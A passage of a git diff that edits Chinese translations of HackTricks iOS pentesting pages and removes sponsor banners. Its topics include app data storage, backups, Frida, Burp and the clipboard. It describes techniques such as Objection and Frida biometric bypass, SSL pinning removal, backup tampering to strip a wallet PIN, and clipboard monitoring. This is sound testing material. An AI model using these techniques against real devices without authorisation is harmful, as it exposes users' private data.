然而,这两个文件夹(数据和容器文件夹)都有文件 **`.com.apple.mobile_container_manager.metadata.plist`**,该文件在键 `MCMetadataIdentifier` 中链接了这两个文件。 -为了方便发现用户安装的应用的安装目录,**objection tool** 提供了一个有用的命令 `env`。该命令显示了相关应用的详细目录信息。以下是如何使用此命令的示例: +为了方便发现用户安装的应用程序的安装目录,**objection tool** 提供了一个有用的命令 `env`。该命令显示了相关应用程序的详细目录信息。以下是如何使用此命令的示例: ```bash OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # env @@ -251,7 +248,7 @@ lsof -p | grep -i "/containers" | head -n 1 - 此目录中的内容**不被备份**。 - 当应用程序未运行且存储空间不足时,操作系统可能会自动删除此目录的文件。 - **Library/Application Support/** -- 包含运行应用程序所需的**持久****文件**。 +- 包含运行应用程序所需的**持久性****文件**。 - 对**用户不可见**,用户无法写入。 - 此目录中的内容**被备份**。 - 应用程序可以通过设置`NSURLIsExcludedFromBackupKey`来禁用路径。 @@ -266,7 +263,7 @@ lsof -p | grep -i "/containers" | head -n 1 - 此目录中的内容不被备份。 - 当应用程序未运行且存储空间不足时,操作系统可能会自动删除此目录的文件。 -让我们仔细看看iGoat-Swift的应用程序包(.app)目录,位于Bundle目录内(`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`): +让我们更仔细地看看iGoat-Swift的应用程序包(.app)目录,位于Bundle目录中(`/var/containers/Bundle/Application/3ADAF47D-A734-49FA-B274-FBCA66589E67/iGoat-Swift.app`): ```bash OWASP.iGoat-Swift on (iPhone: 11.1.2) [usb] # ls NSFileType Perms NSFileProtection ... Name @@ -360,14 +357,6 @@ double _field2; ``` 然而,反汇编二进制文件的最佳选项是:[**Hopper**](https://www.hopperapp.com/download.html?) 和 [**IDA**](https://www.hex-rays.com/products/ida/support/download_freeware/)。 -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %} - ## 数据存储 要了解 iOS 如何在设备中存储数据,请阅读此页面: @@ -377,8 +366,8 @@ ios-basics.md {{#endref}} > [!WARNING] -> 以下存储信息的地方应在 **安装应用程序后**、**检查应用程序的所有功能后**,甚至在 **从一个用户注销并登录到另一个用户后** 进行检查。\ -> 目标是找到应用程序的 **未保护敏感信息**(密码、令牌)、当前用户和之前登录用户的信息。 +> 以下存储信息的位置应在 **安装应用程序后立即** 检查,**在检查应用程序的所有功能后**,甚至在 **从一个用户注销并登录到另一个用户后**。\ +> 目标是找到应用程序的 **未保护的敏感信息**(密码、令牌)、当前用户和之前登录用户的信息。 ### Plist @@ -390,7 +379,7 @@ ios-basics.md 此数据不能再通过受信任的计算机直接访问,但可以通过执行 **备份** 进行访问。 -您可以使用 objection 的 `ios nsuserdefaults get` 来 **转储** 使用 **`NSUserDefaults`** 保存的信息。 +您可以使用 objection 的 `ios nsuserdefaults get` 来 **转储** 保存的信息。 要找到应用程序使用的所有 plist,您可以访问 `/private/var/mobile/Containers/Data/Application/{APPID}` 并运行: ```bash @@ -402,7 +391,7 @@ find ./ -name "*.plist" ```bash $ plutil -convert xml1 Info.plist ``` -**对于 Linux 用户:** 首先安装 `libplist-utils`,然后使用 `plistutil` 转换您的文件: +**对于Linux用户:** 首先安装`libplist-utils`,然后使用`plistutil`转换您的文件: ```bash $ apt install libplist-utils $ plistutil -i Info.plist -o Info_xml.plist @@ -449,7 +438,7 @@ NSLog(@"data stored in core data"); ### 其他 SQLite 数据库 -应用程序通常会创建自己的 sqlite 数据库。它们可能在上面**存储** **敏感** **数据**,并且未加密。因此,检查应用程序目录中的每个数据库总是很有趣。因此,请转到保存数据的应用程序目录 (`/private/var/mobile/Containers/Data/Application/{APPID}`) +应用程序通常会创建自己的 sqlite 数据库。它们可能在其中**存储** **敏感** **数据**,并且未加密。因此,检查应用程序目录中的每个数据库总是很有趣。因此,请转到保存数据的应用程序目录 (`/private/var/mobile/Containers/Data/Application/{APPID}`) ```bash find ./ -name "*.sqlite" -or -name "*.db" ``` @@ -585,7 +574,7 @@ self.backgroundImage.bounds = UIScreen.mainScreen.bounds; #### **存储凭据** -**NSURLCredential** 类非常适合直接在密钥链中保存敏感信息,绕过 NSUserDefaults 或其他包装器的需要。要在登录后存储凭据,可以使用以下 Swift 代码: +**NSURLCredential** 类非常适合直接在密钥链中保存敏感信息,绕过 NSUserDefaults 或其他包装器的需要。要在登录后存储凭据,使用以下 Swift 代码: ```swift NSURLCredential *credential; credential = [NSURLCredential credentialWithUser:username password:password persistence:NSURLCredentialPersistencePermanent]; @@ -621,9 +610,9 @@ textField.autocorrectionType = UITextAutocorrectionTypeNo; 尽管有这些限制,**具有物理访问权限的攻击者**仍然可以通过将设备连接到计算机并**读取日志**来利用这一点。需要注意的是,日志在应用程序卸载后仍然保留在磁盘上。 -为了降低风险,建议**彻底与应用程序交互**,探索其所有功能和输入,以确保没有敏感信息被意外记录。 +为了降低风险,建议**彻底与应用程序互动**,探索其所有功能和输入,以确保没有敏感信息被意外记录。 -在检查应用程序源代码以寻找潜在泄露时,查找使用关键字如`NSLog`、`NSAssert`、`NSCAssert`、`fprintf`的**预定义**和**自定义日志语句**,以及任何提到`Logging`或`Logfile`的自定义实现。 +在审查应用程序的源代码以查找潜在泄露时,查找使用关键字如`NSLog`、`NSAssert`、`NSCAssert`、`fprintf`的**预定义**和**自定义日志语句**,以及任何提及`Logging`或`Logfile`的自定义实现。 ### **监控系统日志** @@ -647,33 +636,23 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock ``` 跟随命令观察日志活动,这对于诊断问题或识别日志中的潜在数据泄漏非常宝贵。 ---- - -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -今天就获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %} - ## 备份 -**自动备份功能** 集成在 iOS 中,通过 iTunes(最多支持 macOS Catalina)、Finder(从 macOS Catalina 开始)或 iCloud 方便地创建设备数据副本。这些备份几乎涵盖所有设备数据,排除高度敏感的元素,如 Apple Pay 详细信息和 Touch ID 配置。 +**自动备份功能**集成在iOS中,通过iTunes(最多支持macOS Catalina)、Finder(从macOS Catalina开始)或iCloud便于创建设备数据副本。这些备份几乎涵盖所有设备数据,排除高度敏感的元素,如Apple Pay详细信息和Touch ID配置。 ### 安全风险 -**已安装应用及其数据** 的备份引发了潜在 **数据泄漏** 的问题,以及 **备份修改可能改变应用功能** 的风险。建议 **不要在任何应用的目录或其子目录中以明文存储敏感信息** 以降低这些风险。 +**已安装应用及其数据**的备份引发了潜在**数据泄漏**的问题,以及**备份修改可能改变应用功能**的风险。建议**不要在任何应用的目录或其子目录中以明文存储敏感信息**以降低这些风险。 ### 从备份中排除文件 -`Documents/` 和 `Library/Application Support/` 中的文件默认会被备份。开发者可以使用 `NSURL setResourceValue:forKey:error:` 和 `NSURLIsExcludedFromBackupKey` 来排除特定文件或目录的备份。这一做法对于保护敏感数据不被包含在备份中至关重要。 +`Documents/`和`Library/Application Support/`中的文件默认会被备份。开发者可以使用`NSURL setResourceValue:forKey:error:`和`NSURLIsExcludedFromBackupKey`来排除特定文件或目录。这一做法对于保护敏感数据不被包含在备份中至关重要。 ### 测试漏洞 -要评估应用的备份安全性,首先使用 Finder **创建备份**,然后根据 [Apple 的官方文档](https://support.apple.com/en-us/HT204215) 找到它。分析备份中可能影响应用行为的敏感数据或配置。 +要评估应用的备份安全性,首先通过Finder**创建一个备份**,然后根据[Apple的官方文档](https://support.apple.com/en-us/HT204215)找到它。分析备份中可能影响应用行为的敏感数据或配置。 -可以使用命令行工具或像 [iMazing](https://imazing.com) 这样的应用程序寻找敏感信息。对于加密备份,可以通过检查备份根目录中的 "Manifest.plist" 文件中的 "IsEncrypted" 键来确认是否存在加密。 +可以使用命令行工具或像[iMazing](https://imazing.com)这样的应用程序来寻找敏感信息。对于加密备份,可以通过检查备份根目录中的"Manifest.plist"文件中的"IsEncrypted"键来确认加密的存在。 ```xml @@ -690,11 +669,11 @@ iPhone:~ root# socat - UNIX-CONNECT:/var/run/lockdown/syslog.sock ### 修改应用行为 -通过备份修改来改变应用行为的一个例子是在[Bither比特币钱包应用](https://github.com/bither/bither-ios)中演示的,其中UI锁定PIN存储在`net.bither.plist`的**pin_code**键下。将此键从plist中删除并恢复备份将移除PIN要求,从而提供无限制访问。 +通过备份修改来改变应用行为的一个例子是在[Bither比特币钱包应用](https://github.com/bither/bither-ios)中展示的,其中UI锁定PIN存储在`net.bither.plist`的**pin_code**键下。将此键从plist中删除并恢复备份将移除PIN要求,从而提供无限制访问。 ## 关于敏感数据内存测试的总结 -在处理存储在应用程序内存中的敏感信息时,限制这些数据的暴露时间至关重要。调查内存内容的两种主要方法是:**创建内存转储**和**实时分析内存**。这两种方法都有其挑战,包括在转储过程或分析过程中可能会错过关键数据。 +在处理存储在应用程序内存中的敏感信息时,限制这些数据的暴露时间至关重要。调查内存内容的主要方法有两种:**创建内存转储**和**实时分析内存**。这两种方法都有其挑战,包括在转储过程或分析过程中可能会错过关键数据。 ## **检索和分析内存转储** @@ -721,7 +700,7 @@ $ r2 $ r2 frida://usb// [0x00000000]> /\ ``` -## 破损的加密 +## 破损的加密技术 ### 不良的密钥管理流程 @@ -745,7 +724,7 @@ ios monitor crypt **本地身份验证** 在保护远程端点的访问方面,尤其是通过加密方法,发挥着至关重要的作用。关键在于,如果没有正确的实现,本地身份验证机制可能会被绕过。 -Apple 的 [**本地身份验证框架**](https://developer.apple.com/documentation/localauthentication) 和 [**钥匙串**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) 为开发者提供了强大的 API,以便于用户身份验证对话框并安全处理秘密数据。安全隔离区保护 Touch ID 的指纹 ID,而 Face ID 则依赖于面部识别而不妥协生物识别数据。 +苹果的 [**本地身份验证框架**](https://developer.apple.com/documentation/localauthentication) 和 [**钥匙串**](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/01introduction/introduction.html) 为开发者提供了强大的 API,以便于用户身份验证对话框和安全处理秘密数据。安全隔 enclave 保护 Touch ID 的指纹 ID,而 Face ID 则依赖于面部识别而不妥协生物识别数据。 要集成 Touch ID/Face ID,开发者有两个 API 选择: @@ -770,7 +749,7 @@ Apple 的 [**本地身份验证框架**](https://developer.apple.com/documentati 钥匙串提供了设置带有 `SecAccessControl` 属性的项目的能力,该属性限制对该项目的访问,直到用户通过 Touch ID 或设备密码成功身份验证。此功能对于增强安全性至关重要。 -以下是 Swift 和 Objective-C 中的代码示例,演示如何将字符串保存到钥匙串并从中检索,利用这些安全功能。示例特别展示了如何设置访问控制以要求 Touch ID 身份验证,并确保数据仅在设置的设备上可访问,前提是已配置设备密码。 +以下是 Swift 和 Objective-C 中的代码示例,演示如何将字符串保存到钥匙串并从中检索,利用这些安全功能。示例特别展示了如何设置访问控制以要求 Touch ID 身份验证,并确保数据仅在设置的设备上可访问,前提是配置了设备密码。 {{#tabs}} {{#tab name="Swift"}} @@ -912,7 +891,7 @@ $ otool -L .app/ #### **Objection** -通过位于 [this GitHub page](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass) 的 **Objection Biometrics Bypass**,可以使用一种技术来克服 **LocalAuthentication** 机制。该方法的核心在于利用 **Frida** 操作 `evaluatePolicy` 函数,确保其始终返回 `True` 结果,无论实际身份验证是否成功。这对于绕过有缺陷的生物识别身份验证过程特别有用。 +通过位于 [this GitHub page](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass) 的 **Objection Biometrics Bypass**,可以使用一种技术来克服 **LocalAuthentication** 机制。该方法的核心在于利用 **Frida** 操作 `evaluatePolicy` 函数,确保其始终返回 `True` 结果,而不管实际的身份验证是否成功。这对于绕过有缺陷的生物识别身份验证过程特别有用。 要激活此绕过,使用以下命令: ```bash @@ -1038,12 +1017,12 @@ burp-configuration-for-ios.md ### 主机名检查 -验证 TLS 证书的一个常见问题是检查证书是否由 **受信任的** **CA** 签名,但 **不检查** **证书的主机名** 是否是正在访问的主机名。\ +验证 TLS 证书的一个常见问题是检查证书是否由 **受信任的** **CA** 签署,但 **不检查** **证书的主机名** 是否是正在访问的主机名。\ 为了使用 Burp 检查此问题,在 iPhone 中信任 Burp CA 后,可以 **为不同的主机名使用 Burp 创建新证书**。如果应用程序仍然可以正常工作,那么它就存在漏洞。 ### 证书钉扎 -如果应用程序正确使用 SSL 钉扎,则应用程序仅在证书是预期的证书时才能正常工作。在测试应用程序时 **这可能是一个问题,因为 Burp 将提供自己的证书。**\ +如果应用程序正确使用 SSL 钉扎,则只有在证书是预期的证书时,应用程序才会正常工作。在测试应用程序时 **这可能是一个问题,因为 Burp 将提供自己的证书。**\ 为了绕过这种保护,可以在越狱设备上安装应用程序 [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) 或安装 [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) 您还可以使用 **objection's** `ios sslpinning disable` @@ -1052,22 +1031,22 @@ burp-configuration-for-ios.md - 在 **`/System/Library`** 中可以找到系统应用使用的框架 - 用户从 App Store 安装的应用程序位于 **`/User/Applications`** -- **`/User/Library`** 包含用户级应用程序保存的数据 +- **`/User/Library`** 包含用户级应用保存的数据 - 您可以访问 **`/User/Library/Notes/notes.sqlite`** 以读取应用程序中保存的笔记。 - 在已安装应用程序的文件夹中 (**`/User/Applications//`**) 您可以找到一些有趣的文件: - **`iTunesArtwork`**:应用程序使用的图标 -- **`iTunesMetadata.plist`**:在 App Store 中使用的应用程序信息 +- **`iTunesMetadata.plist`**:在 App Store 中使用的应用信息 - **`/Library/*`**:包含首选项和缓存。在 **`/Library/Cache/Snapshots/*`** 中可以找到在将应用程序发送到后台之前对其进行的快照。 ### 热补丁/强制更新 -开发人员可以 **立即远程修补其应用程序的所有安装**,而无需重新提交应用程序到 App Store 并等待批准。\ +开发人员可以 **立即远程修补其应用的所有安装**,而无需重新提交应用程序到 App Store 并等待批准。\ 为此,通常使用 [**JSPatch**](https://github.com/bang590/JSPatch)**.** 但还有其他选项,如 [Siren](https://github.com/ArtSabintsev/Siren) 和 [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker)。\ **这是一种危险的机制,可能会被恶意第三方 SDK 滥用,因此建议检查用于自动更新的方法(如果有的话)并进行测试。** 您可以尝试下载该应用程序的先前版本以此目的。 ### 第三方 -**第三方 SDK** 的一个重大挑战是 **缺乏对其功能的细粒度控制**。开发人员面临选择:要么集成 SDK 并接受其所有功能,包括潜在的安全漏洞和隐私问题,要么完全放弃其好处。通常,开发人员无法自行修补这些 SDK 中的漏洞。此外,随着 SDK 在社区中获得信任,有些可能会开始包含恶意软件。 +**第三方 SDK** 的一个重大挑战是 **缺乏对其功能的细粒度控制**。开发人员面临选择:要么集成 SDK 并接受其所有功能,包括潜在的安全漏洞和隐私问题,要么完全放弃其好处。通常,开发人员无法自行修补这些 SDK 中的漏洞。此外,随着 SDK 在社区中获得信任,一些 SDK 可能开始包含恶意软件。 第三方 SDK 提供的服务可能包括用户行为跟踪、广告展示或用户体验增强。然而,这带来了风险,因为开发人员可能并不完全了解这些库执行的代码,从而导致潜在的隐私和安全风险。限制与第三方服务共享的信息仅限于必要的信息,并确保没有敏感数据被暴露是至关重要的。 @@ -1105,11 +1084,5 @@ otool -L - [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) - [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2) -
-\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ios-pentesting) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -今天就获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ios-pentesting" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index 8478ad60f..9c4c01402 100644 --- a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -2,14 +2,6 @@ {{#include ../../banners/hacktricks-training.md}} -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -立即获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %} - ## 在 iOS 设备上安装 Burp 证书 为了对 iOS 设备上的安全网络流量进行分析和 SSL 钉扎,可以通过 **Burp Mobile Assistant** 或手动配置来使用 Burp Suite。以下是两种方法的简要指南: @@ -48,7 +40,7 @@ ssh -R 8080:localhost:8080 root@localhost -p 2222 ### 完整网络监控/嗅探 -可以使用 **Wireshark** 有效监控非 HTTP 设备流量,该工具能够捕获所有形式的数据流量。对于 iOS 设备,通过创建远程虚拟接口来实现实时流量监控,具体过程详见 [这篇 Stack Overflow 帖子](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819)。在开始之前,必须在 macOS 系统上安装 **Wireshark**。 +可以使用 **Wireshark** 有效监控非 HTTP 设备流量,该工具能够捕获所有形式的数据流量。对于 iOS 设备,通过创建远程虚拟接口来实现实时流量监控,具体过程详见 [这篇 Stack Overflow 帖子](https://stackoverflow.com/questions/9555403/capturing-mobile-phone-traffic-on-wireshark/33175819#33175819)。在开始之前,需在 macOS 系统上安装 **Wireshark**。 该过程涉及几个关键步骤: @@ -58,7 +50,7 @@ ssh -R 8080:localhost:8080 root@localhost -p 2222 $ rvictl -s Starting device [SUCCEEDED] with interface rvi0 ``` -3. 在识别 UDID 后,**Wireshark** 将被打开,并选择 "rvi0" 接口进行数据捕获。 +3. 在识别 UDID 后,**Wireshark** 应该被打开,并选择 "rvi0" 接口进行数据捕获。 4. 对于目标监控,例如捕获与特定 IP 地址相关的 HTTP 流量,可以使用 Wireshark 的捕获过滤器: ## 在模拟器中安装 Burp 证书 @@ -70,8 +62,8 @@ Starting device [SUCCEEDED] with interface rvi0 ![](<../../images/image (534).png>) - **拖放**证书到模拟器内 -- **在模拟器内**前往 _Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_,并**验证证书** -- **在模拟器内**前往 _Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_,并**启用 PortSwigger CA** +- **在模拟器内**前往 _Settings_ --> _General_ --> _Profile_ --> _PortSwigger CA_,并 **验证证书** +- **在模拟器内**前往 _Settings_ --> _General_ --> _About_ --> _Certificate Trust Settings_,并 **启用 PortSwigger CA** ![](<../../images/image (1048).png>) @@ -92,11 +84,5 @@ Starting device [SUCCEEDED] with interface rvi0 - 点击 _**Ok**_ 然后在 _**Apply**_ -
-\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=burp-configuration-for-ios) 轻松构建和**自动化工作流程**,由世界上**最先进**的社区工具提供支持。\ -今天就获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=burp-configuration-for-ios" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 4df1629b4..7ada51a1b 100644 --- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -2,20 +2,14 @@ {{#include ../../banners/hacktricks-training.md}} -
- -通过 8kSec Academy 深入了解 **移动安全**。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} - ## 安装 Frida **在越狱设备上安装 Frida 的步骤:** 1. 打开 Cydia/Sileo 应用。 -2. 导航到管理 -> 源 -> 编辑 -> 添加。 +2. 导航到 管理 -> 源 -> 编辑 -> 添加。 3. 输入 "https://build.frida.re" 作为 URL。 -4. 转到新添加的 Frida 源。 +4. 前往新添加的 Frida 源。 5. 安装 Frida 包。 如果您使用 **Corellium**,您需要从 [https://github.com/frida/frida/releases](https://github.com/frida/frida/releases) 下载 Frida 版本 (`frida-gadget-[yourversion]-ios-universal.dylib.gz`),并解压并复制到 Frida 要求的 dylib 位置,例如:`/Users/[youruser]/.cache/frida/gadget-ios.dylib` @@ -34,7 +28,7 @@ pip install frida-tools pip install frida ``` -安装了 Frida 服务器并且设备正在运行和连接,**检查**客户端是否**正常工作**: +安装了 Frida 服务器并且设备正在运行并连接,**检查**客户端是否**正常工作**: ```bash frida-ls-devices # List devices frida-ps -Uia # Get running processes @@ -140,7 +134,7 @@ console.log("loaded") ### Frida Stalker -[From the docs](https://frida.re/docs/stalker/): Stalker 是 Frida 的代码 **跟踪引擎**。它允许线程被 **跟踪**,**捕获** 每个函数、**每个块**,甚至每个执行的指令。 +[From the docs](https://frida.re/docs/stalker/): Stalker 是 Frida 的代码 **跟踪引擎**。它允许线程被 **跟踪**,**捕获** 每个函数、**每个块**,甚至每条执行的指令。 您可以在 [https://github.com/poxyran/misc/blob/master/frida-stalker-example.py](https://github.com/poxyran/misc/blob/master/frida-stalker-example.py) 找到一个实现 Frida Stalker 的示例。 @@ -189,7 +183,7 @@ Stalker.flush() // this is important to get all events [**fpicker**](https://github.com/ttdennis/fpicker) 是一个 **基于Frida的模糊测试套件**,提供多种进程内模糊测试模式,如AFL++模式或被动跟踪模式。它应该可以在所有Frida支持的平台上运行。 -- [**安装 fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** +- [**安装fpicker**](https://github.com/ttdennis/fpicker#requirements-and-installation) **& radamsa** ```bash # Get fpicker git clone https://github.com/ttdennis/fpicker @@ -321,7 +315,7 @@ vim /Library/Preferences/Logging/com.apple.system.logging.plist killall -9 logd ``` -您可以检查崩溃记录: +您可以检查崩溃记录在: - **iOS** - 设置 → 隐私 → 分析与改进 → 分析数据 @@ -343,10 +337,5 @@ killall -9 logd - [https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida](https://www.briskinfosec.com/blogs/blogsdetail/Getting-Started-with-Frida) -
- -通过 8kSec 学院深化您在 **移动安全** 方面的专业知识。通过我们的自学课程掌握 iOS 和 Android 安全并获得认证: - -{% embed url="https://academy.8ksec.io/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index a5d4ab703..3f5ed3e42 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -1,47 +1,43 @@ {{#include ../../banners/hacktricks-training.md}} -
+在 iOS 设备上,应用程序之间的数据共享是通过 [`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard) 机制实现的,该机制分为两类: -{% embed url="https://websec.nl/" %} +- **系统范围的通用粘贴板**:用于与 **任何应用程序** 共享数据,并设计为在设备重启和应用程序卸载之间持久化数据,该功能自 iOS 10 起可用。 +- **自定义/命名粘贴板**:专门用于 **在应用程序内或与共享相同团队 ID 的其他应用程序** 共享数据,并不设计为在创建它们的应用程序进程的生命周期之外持久化,遵循 iOS 10 引入的更改。 -在iOS设备上,应用程序之间的数据共享是通过[`UIPasteboard`](https://developer.apple.com/documentation/uikit/uipasteboard)机制实现的,该机制分为两个主要类别: +**安全考虑** 在使用粘贴板时起着重要作用。例如: -- **系统范围的通用粘贴板**:用于与**任何应用程序**共享数据,并设计为在设备重启和应用程序卸载之间保持数据,这是自iOS 10以来提供的功能。 -- **自定义/命名粘贴板**:这些专门用于**在应用程序内或与共享相同团队ID的另一个应用程序**之间共享数据,并且不设计为在创建它们的应用程序进程的生命周期之外保持数据,这遵循了iOS 10引入的变化。 - -**安全考虑**在使用粘贴板时发挥着重要作用。例如: - -- 用户没有机制来管理应用程序访问**粘贴板**的权限。 -- 为了减轻未经授权的后台监控粘贴板的风险,访问限制为应用程序在前台时(自iOS 9以来)。 +- 用户没有机制来管理应用程序访问 **粘贴板** 的权限。 +- 为了减轻未经授权的后台监控粘贴板的风险,访问限制为应用程序在前台时(自 iOS 9 起)。 - 由于隐私问题,不鼓励使用持久命名粘贴板,而是倾向于使用共享容器。 -- 随着iOS 10引入的**通用剪贴板**功能,允许通过通用粘贴板在设备之间共享内容,开发人员可以管理数据过期并禁用自动内容传输。 +- 随着 iOS 10 引入的 **通用剪贴板** 功能,允许通过通用粘贴板在设备之间共享内容,开发人员可以管理数据过期和禁用自动内容传输。 -确保**敏感信息不会意外存储**在全局粘贴板上至关重要。此外,应用程序应设计为防止全局粘贴板数据被误用进行意外操作,并鼓励开发人员实施措施以防止将敏感信息复制到剪贴板。 +确保 **敏感信息不会无意中存储** 在全局粘贴板上至关重要。此外,应用程序应设计为防止全局粘贴板数据被误用进行意外操作,鼓励开发人员实施措施以防止将敏感信息复制到剪贴板。 ### 静态分析 对于静态分析,搜索源代码或二进制文件中的: -- `generalPasteboard`以识别**系统范围的通用粘贴板**的使用。 -- `pasteboardWithName:create:`和`pasteboardWithUniqueName`以创建**自定义粘贴板**。验证是否启用了持久性,尽管这已被弃用。 +- `generalPasteboard` 以识别 **系统范围的通用粘贴板** 的使用。 +- `pasteboardWithName:create:` 和 `pasteboardWithUniqueName` 用于创建 **自定义粘贴板**。验证是否启用了持久性,尽管这已被弃用。 ### 动态分析 动态分析涉及钩住或跟踪特定方法: -- 监控`generalPasteboard`以获取系统范围的使用情况。 -- 跟踪`pasteboardWithName:create:`和`pasteboardWithUniqueName`以获取自定义实现。 -- 观察已弃用的`setPersistent:`方法调用以检查持久性设置。 +- 监控 `generalPasteboard` 的系统范围使用。 +- 跟踪 `pasteboardWithName:create:` 和 `pasteboardWithUniqueName` 的自定义实现。 +- 观察已弃用的 `setPersistent:` 方法调用以检查持久性设置。 需要监控的关键细节包括: -- **粘贴板名称**和**内容**(例如,检查字符串、URL、图像)。 -- **项目数量**和**数据类型**,利用标准和自定义数据类型检查。 -- 通过检查`setItems:options:`方法来查看**过期和本地选项**。 +- **粘贴板名称** 和 **内容**(例如,检查字符串、URL、图像)。 +- **项目数量** 和 **数据类型**,利用标准和自定义数据类型检查。 +- 通过检查 `setItems:options:` 方法来查看 **过期和本地选项**。 -监控工具使用的一个示例是**objection的粘贴板监视器**,它每5秒轮询一次generalPasteboard以检查更改并输出新数据。 +监控工具使用的一个示例是 **objection 的粘贴板监视器**,每 5 秒轮询一次 generalPasteboard 以检查更改并输出新数据。 -这是一个简单的JavaScript脚本示例,灵感来自objection的方法,每5秒读取并记录粘贴板的更改: +这是一个简单的 JavaScript 脚本示例,灵感来自 objection 的方法,每 5 秒读取并记录粘贴板的更改: ```javascript const UIPasteboard = ObjC.classes.UIPasteboard const Pasteboard = UIPasteboard.generalPasteboard() @@ -78,8 +74,5 @@ console.log(items) - [https://hackmd.io/@robihamanto/owasp-robi](https://hackmd.io/@robihamanto/owasp-robi) - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/) -
- -{% embed url="https://websec.nl/" %} {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/1099-pentesting-java-rmi.md b/src/network-services-pentesting/1099-pentesting-java-rmi.md index b317097a5..5f804ed7d 100644 --- a/src/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md @@ -2,17 +2,9 @@ {{#include ../banners/hacktricks-training.md}} -
- -\ -使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=1099-pentesting-java-rmi) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\ -今天就获取访问权限: - -{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=1099-pentesting-java-rmi" %} - ## 基本信息 -_Java远程方法调用_,或 _Java RMI_,是一种面向对象的 _RPC_ 机制,允许位于一个 _Java虚拟机_ 中的对象调用位于另一个 _Java虚拟机_ 中的对象的方法。这使得开发人员能够使用面向对象的范式编写分布式应用程序。从攻击的角度来看,关于 _Java RMI_ 的简要介绍可以在 [这场黑帽演讲](https://youtu.be/t_aw1mDNhzI?t=202) 中找到。 +_Java远程方法调用_,或称为 _Java RMI_,是一种面向对象的 _RPC_ 机制,允许位于一个 _Java虚拟机_ 中的对象调用位于另一个 _Java虚拟机_ 中的对象的方法。这使得开发人员能够使用面向对象的范式编写分布式应用程序。从攻击的角度来看,关于 _Java RMI_ 的简短介绍可以在 [this blackhat 